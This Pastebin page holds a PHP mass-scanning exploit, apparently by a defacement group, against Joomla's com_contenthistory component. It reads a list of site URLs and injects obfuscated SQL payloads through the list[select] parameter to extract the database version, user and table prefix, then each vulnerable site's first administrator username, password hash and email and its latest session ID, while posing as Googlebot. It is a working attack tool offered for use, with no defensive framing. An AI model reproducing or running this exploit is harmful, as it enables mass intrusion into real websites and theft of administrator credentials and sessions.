Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- @set_time_limit(0);
- echo'<meta content=XPLOITER BY AZZATSSINS CYBERSERKERS OF PSYCHOPATH name=description>
- <title>!!!- JOOMLA SQL | AZZATSSINS | BN-IDBTE4M -!!!</title>
- <body style=color: #000000;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;>
- <center>
- <form method="post">
- <textarea name="ss" cols="30" rows="15" ></textarea><br>
- <input name="g" type="submit" value="EXECUTE"/>
- </form>
- </center>';
- $g = $_POST['g']; $ss = $_POST['ss'];
- if(isset($g)){
- $arr = explode("\r\n",$ss);
- foreach($arr as $url){
- $url = @trim($url);
- $py1="polygon%28%28/*!00000select*/*/*!00000from*/%28/*!00000select*/*/*!00000from*/%28/*!00000select*/concat_ws%280x7e3a,0x6d616769636f,version%28%29,user%28%29%29as%20mk%29%60%60%29%60%60%29%29";
- $py2="polygon((/*!00000select*/*/*!00000from*/(/*!00000select*/*/*!00000from*/(/*!00000select*/concat_ws(0x7e3a,0x6d616769636f,(/*!00000select*//*!00000table_name*//*!00000from*//*!00000information_schema*/.tables/*!00000where*/table_schema=database() and/*!00000table_name*/like 0x25636f6e74656e745f7479706573 limit 0,1))as mk)``)``))";
- $site = "$url/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=$py1";
- $site2 = "$url/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=$py2";
- $src= data($site);
- preg_match("#select 'magico~:(.*?)~:(.*?)' AS#",$src,$m);
- if(!empty($m[1])){
- echo "----------------------------------------------------------</font><br>";
- echo "<b>[#] $url : vuln<b><br></font><br>";
- echo "<font color=lime>[+] version : $m[1]</font><br>";
- echo "<font color=lime>[+] user db : $m[2]</font><br>";
- $src2= data($site2);
- preg_match("#LEFT JOIN (.*?)_users#",$src,$m2);
- echo "<font color=lime>[+] prefix : ".$m2[1]."_</font><br>";
- $prfx = $m2[1];
- $py3="polygon((/*!00000select*/*/*!00000from*/(/*!00000select*/*/*!00000from*/(/*!00000select*/concat_ws(0x7e3a,(/*!00000select*/concat_ws(0x7e3a,0x6d616769636f,username,password,email)+/*!00000from*/+"."$prfx"."_users+order+by+id+ASC+limit+0,1),(/*!00000select*/session_id+/*!00000from*/+"."$prfx"."_session+order+by+time+DESC+limit+0,1))as+mk)``)``))";
- $site3 = "$url/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=$py3";
- $src3= data($site3);
- preg_match("/select 'magico\~:(.*?)\~:(.*?)\~:(.*?)\~:(.*?)' AS/",$src3,$m3);
- echo "<font color=lime>[+] user : $m3[1]</font><br>";
- echo "<font color=lime>[+] pass : $m3[2]</font><br>";
- echo "<font color=lime>[+] email : $m3[3]</font><br>";
- echo "<font color=lime>[+] session_id : $m3[4]</b></font><br>";
- }else{echo "----------------------------------------------------------</font><br>";
- echo "<font color=red> [-]$url : Not Vuln </font><br>";
- }
- }
- }
- function data($vln){
- $curl = curl_init();
- curl_setopt($curl, CURLOPT_URL, $vln);
- curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
- curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
- $source = curl_exec($curl);
- return $source;
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement